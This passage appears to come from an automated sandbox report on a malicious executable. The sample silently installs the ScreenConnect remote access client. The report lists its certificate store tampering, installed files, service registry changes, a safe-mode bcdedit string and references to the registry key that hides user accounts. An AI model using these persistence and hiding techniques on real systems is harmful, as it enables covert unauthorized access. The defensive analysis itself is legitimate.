                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00AC1000
                  Source: 3coxOaV92n.exeStatic PE information: real checksum: 0x212e6 should be: 0x1ebb8
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1BC0 push ecx; ret 0_2_00AC1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848D6D2A5 pushad ; iretd 1_2_00007FF848D6D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E87ABB push ss; retn 5F4Ch1_2_00007FF848E87B07
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA1BC0 pushfd ; retf 1_2_00007FF848EA5991
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E8A538 push ebp; retn 5F49h1_2_00007FF848EB7A28
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E87AA0 push ss; retn 5F4Ch1_2_00007FF848E87B07
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA4C6D push edx; retn 000Eh1_2_00007FF848EA4C6E
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E800BD pushad ; iretd 1_2_00007FF848E800C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E8843D push eax; ret 1_2_00007FF848E8846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848E87569 push ebx; iretd 9_2_00007FF848E8756A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 10_2_02A77A8B push 8B03CA23h; iretd 10_2_02A77A95
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD83B3 push es; iretd 11_2_00DD83C2
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD83A3 push es; iretd 11_2_00DD83B2
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD8407 push es; iretd 11_2_00DD8412
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDE671 push 5D0803D0h; iretd 11_2_00DDE67E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDE610 push 26E003D0h; iretd 11_2_00DDE65E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDA623 pushfd ; iretd 11_2_00DDA641
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDA89F push ds; iretd 11_2_00DDA8BE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDA88F push ds; iretd 11_2_00DDA89E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDA9A1 push ss; iretd 11_2_00DDA9AE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDCDEB pushfd ; iretd 11_2_00DDCDF9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDCD13 pushad ; iretd 11_2_00DDCD22
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDCD23 pushad ; iretd 11_2_00DDCD32
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDCE0B push eax; iretw 11_2_00DDCE19
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDD069 push esp; iretd 11_2_00DDD076
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DDD6F0 pushad ; iretd 11_2_00DDD6FE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD97E0 push es; iretd 11_2_00DD97EE
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD9E1F push ss; iretd 11_2_00DD9E2A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_00DD9E2B push ss; iretd 11_2_00DD9E3A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_05351550 push esp; ret 11_2_05351563
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_05350006 push esi; iretd 11_2_0535003E

                  Persistence and Installation Behavior

                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a7ee4b85-96fb-4d9a-b419-6636f94d66aa)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.2420666021.0000000005142000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.3285857919.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474342978.0000000001290000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
